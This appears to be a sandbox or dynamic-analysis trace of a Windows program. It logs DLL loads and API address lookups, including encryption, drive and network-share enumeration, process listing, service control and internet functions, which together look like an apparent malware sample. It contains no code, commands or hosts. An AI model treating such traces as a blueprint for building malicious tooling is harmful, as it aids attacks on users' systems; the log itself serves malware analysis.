Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = RPCRT4.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Module Load module_name = MPR.dll, base_address = 0x750f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x750f3058 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x750f2f06 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x750f2dd6 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75d30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Module Load module_name = WINMM.dll, base_address = 0x750b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x750b26e0 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x77020000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x770381ef True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75361986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x7538830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x7536183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7538896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7538828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75362d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x75365558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x75364467 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x753634d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75491361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x75487136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75489679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x76f77144 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x76b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b53eae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x76b53ed5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x76b55dee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x76b54af8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x76b53e59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x76b53f21 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x76b54642 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x76b5fd6b True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x75090000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x75099263 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x76b10000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x76b1311b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x76b27673 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x76b1b131 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x75030000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x7503436b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x7504572c True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x751a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74f70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x74f8c544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:38:51 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13229078529 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
